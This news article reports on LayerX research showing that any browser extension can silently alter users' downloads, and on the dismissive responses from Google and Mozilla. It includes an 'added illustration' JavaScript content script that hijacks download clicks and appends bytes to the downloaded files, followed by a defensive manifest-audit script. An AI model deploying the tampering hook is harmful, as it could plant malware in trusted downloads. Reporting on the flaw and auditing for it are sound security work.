Any browser extension can secretly install malware, researchers demonstrate


A handy price tracker, ad blocker, AI chatbot, or any other extension can turn malicious overnight and secretly install malware. Security researchers have demonstrated that an extension can modify every file a user downloads without requesting any additional permissions, and neither Google nor Mozilla treats this as a bug.

LayerX Security researchers warn that browser extensions have a massive security blind spot.

“An extension, by the mere act of downloading it, is granted enormous implicit power,” they said.


“Any extension can be weaponized to install malware on target hosts.”

Yet many users still see them as harmless add-ons, living somewhere between bookmarks and settings and kept in check by the browser's sandbox.


To demonstrate the danger, the researchers crafted their own Chrome extension. Once the user downloads and opens a file, even one from a legitimate and trusted source, it is already too late.

The video in the report showcases a Chrome user with “Totally Innocent Extension” installed.

They visit the legitimate Spotify website and download the music streaming app. The user then clicks on the downloaded file, expecting the installer to start; instead, the calculator app pops up. At this point in a real attack, the system would already be compromised.

“In our demonstration, the payload simply opens the calculator app as a benign visual indicator. In a real-world scenario, it could enable persistence, lateral movement, data exfiltration, or full remote control of the machine,” said Iyar Segev, a security researcher at LayerX.


The proof-of-concept (PoC) extension edits every downloaded file, appending a hidden script.

This requires surprisingly little code and triggers no warnings. A single command line in the appended script is enough to fetch and run malware from an attacker-controlled server.

“We built an extension that silently modifies every file download initiated from any website. The user clicks a legitimate download link on a trusted domain, using a browser they trust. The file downloads exactly as expected.”

How does it work?

Content scripts are a standard capability of browser extensions: declared in the extension's manifest, they run inside the web pages the extension matches and can read and modify those pages. They are the core of most extensions' functionality.

“At first glance, this seems reasonable. Extensions need to modify pages to add features, inject UI elements, or enhance workflows. In fact, this is their whole design goal,” the researchers explain.

However, if extensions can alter websites, they can also alter what a website hands the user: a content script running on a trusted page can intercept a download link and substitute its own bytes. Attackers can exploit this to turn any legitimate website into an attack surface, invisibly and at scale.

Extension Malware Download Flow
Image by LayerX.

“Without breaking the original application, without triggering warnings, and without requiring any additional permissions, the extension appends attacker-controlled code to every downloaded executable. The original program still runs normally, and the user sees exactly what they expect. From there, it’s game over,” Segev said.
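The flow described above, as an added illustration rather than LayerX's own proof-of-concept code. It separates the two halves of the technique: appendTrailer() is the byte-level change to a downloaded file, and installDownloadHook() is what a content script would do on every page to route download clicks through it. The trailer bytes, the list of file extensions treated as downloads and all function names are hypothetical; the helpers also run under Node, where there is no document and the hook simply reports that it did nothing.

```javascript
// Added illustration, not LayerX's PoC: byte-level tampering plus the content-script
// hook that feeds every download through it. All names and constants are hypothetical.

// Hypothetical trailer. The report's PoC appends a script; how appended bytes later
// get executed depends on the file format and is deliberately not shown here.
const TRAILER = new TextEncoder().encode("\n# hypothetical appended script\n");

// Return a copy of the file with the trailer appended. Many installer and archive
// formats tolerate data after their declared end, which is why the original program
// still runs and the user notices nothing.
function appendTrailer(fileBytes, trailer = TRAILER) {
  const out = new Uint8Array(fileBytes.length + trailer.length);
  out.set(fileBytes, 0);
  out.set(trailer, fileBytes.length);
  return out;
}

// Heuristic for "this link is a file download": an explicit download attribute or a
// path ending in a common installer/archive extension (the list is illustrative).
function isDownloadLink(anchor) {
  if (typeof anchor.hasAttribute === "function" && anchor.hasAttribute("download")) return true;
  const path = new URL(anchor.href, "https://example.invalid/").pathname;
  return /\.(exe|msi|dmg|pkg|deb|zip)$/i.test(path);
}

// Content-script side. It runs inside the page, so fetch() carries the site's own
// cookies and no extra extension permission is involved. It captures clicks on
// download links, fetches the original bytes, and hands the user the modified copy
// under the original filename. Returns false when there is no document (e.g. Node).
function installDownloadHook(doc = globalThis.document) {
  if (!doc) return false;
  doc.addEventListener("click", async (ev) => {
    const a = ev.target && ev.target.closest ? ev.target.closest("a[href]") : null;
    if (!a || !isDownloadLink(a)) return;
    ev.preventDefault();                              // the page's own download never starts
    const resp = await fetch(a.href, { credentials: "include" });
    const original = new Uint8Array(await resp.arrayBuffer());
    const tampered = appendTrailer(original);
    const url = URL.createObjectURL(new Blob([tampered]));
    const substitute = doc.createElement("a");
    substitute.href = url;
    substitute.download = a.getAttribute("download") || a.href.split("/").pop() || "download";
    substitute.click();                               // shows up as a normal download
    setTimeout(() => URL.revokeObjectURL(url), 60_000);
  }, true);                                           // capture phase: before the page's handlers
  return true;
}

installDownloadHook();
```

Nothing in the block needs more than a content script matching the target pages: no `downloads`, `webRequest` or other declared permission is touched, which is the point the researchers make about the extension model.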

In effect, the extension's reach extends beyond the browser's sandbox. Strictly speaking, nothing escapes the sandbox: the extension only changes bytes on disk, and it is the user who then runs the modified file with their full privileges outside the browser. That is also why the browser vendors classify the issue as social engineering rather than a sandbox bypass.

Attackers would still need to control the extension itself, either by publishing a malicious one or by compromising an existing one, and both have happened frequently in the past. Researchers routinely discover malicious extensions in official add-on stores. Extensions often turn malicious after changing hands and receiving seemingly routine updates, and users see no reliable signal that anything suspicious has happened.


Neither Google nor Mozilla will fix this

LayerX reported the findings to major browsers. However, the responses were lackluster.

The report quotes Google stating that “social engineering attacks are out of scope for the Chrome threat model.”


In Google's view, users are being tricked into installing the malware themselves.

Meanwhile, Mozilla replied that “when you grant an extension access to all websites, it can modify the content of websites, including changing the destinations of links.”

However, the researchers believe that the current extension security model fails to explain to users what an untrusted extension can do, both to their browsing experience and to the security of the entire system.
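Mozilla's answer points at the one signal a user does have: the permissions and match patterns in an extension's manifest.json. The following is an added example, not code from LayerX, Google or Mozilla, that audits a manifest for exactly the capability the report relies on, a content script injected into every site, and also flags broad host access and permissions that touch downloads, network traffic or script injection. The two sample manifests are constructed; only the demo extension's name comes from the report, everything else in them is hypothetical.

```javascript
// Added example (not the researchers' or the browser vendors' code): audit an
// extension manifest for "runs on every site" content scripts and related grants.

// Match patterns that make a content script or host permission apply to every site.
function isBroadMatch(pattern) {
  if (pattern === "<all_urls>") return true;
  // scheme://host/path where the host is a bare "*" covers every site on that scheme
  const m = /^(\*|https?|file|ftp):\/\/([^/]+)\//.exec(pattern);
  return m !== null && m[2] === "*";
}

// Permissions that let an extension touch downloads, traffic or injected scripts directly.
const DIRECT_ACCESS = ["downloads", "webRequest", "webRequestBlocking", "declarativeNetRequest", "scripting"];

function auditManifest(manifest) {
  const findings = [];
  for (const cs of manifest.content_scripts || []) {
    const broad = (cs.matches || []).filter(isBroadMatch);
    if (broad.length > 0) {
      findings.push(`content script [${(cs.js || []).join(", ")}] injected on every site via ${broad.join(", ")}`);
    }
  }
  // MV3 lists host access under host_permissions; MV2 mixed host patterns into permissions.
  const hosts = [...(manifest.host_permissions || []), ...(manifest.permissions || [])].filter(isBroadMatch);
  if (hosts.length > 0) findings.push(`host access to every site: ${hosts.join(", ")}`);
  const risky = (manifest.permissions || []).filter((p) => DIRECT_ACCESS.includes(p));
  if (risky.length > 0) findings.push(`direct download/network/script permissions: ${risky.join(", ")}`);
  return { name: manifest.name || "(unnamed)", flagged: findings.length > 0, findings };
}

function auditAll(manifests) {
  return manifests.map(auditManifest);
}

// Constructed sample manifests (hypothetical; only the first name is from the report).
const SAMPLE_MANIFESTS = [
  {
    name: "Totally Innocent Extension",
    manifest_version: 3,
    content_scripts: [{ matches: ["<all_urls>"], js: ["content.js"], run_at: "document_start" }],
    permissions: [],
  },
  {
    name: "Site-scoped helper",
    manifest_version: 3,
    content_scripts: [{ matches: ["https://*.example.com/*"], js: ["helper.js"] }],
    permissions: ["storage"],
  },
];

for (const r of auditAll(SAMPLE_MANIFESTS)) {
  console.log(`${r.flagged ? "FLAG" : "ok  "} ${r.name}`);
  for (const f of r.findings) console.log(`      ${f}`);
}
```

On a desktop Chrome profile each installed extension's manifest sits under the profile directory at Extensions/<extension id>/<version>/manifest.json, with the ID visible on chrome://extensions; point the audit at those files to get the same verdict the sample run prints. A flagged result is not proof of malice, only confirmation that the extension has the reach the report describes, which is the part the install prompt does not convey.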

Cybernews has previously reported on the dangers of extensions – they “see everything,” and the entire supply chain is vulnerable to attackers.

“There are innumerable ways in which extensions can be exploited to bypass user trust. The browser has quietly become a primary execution environment, a distribution channel, and a control plane, while remaining largely unmonitored by traditional security tools. Extensions sit at the intersection of user trust and system-level impact,” the LayerX researcher concluded.

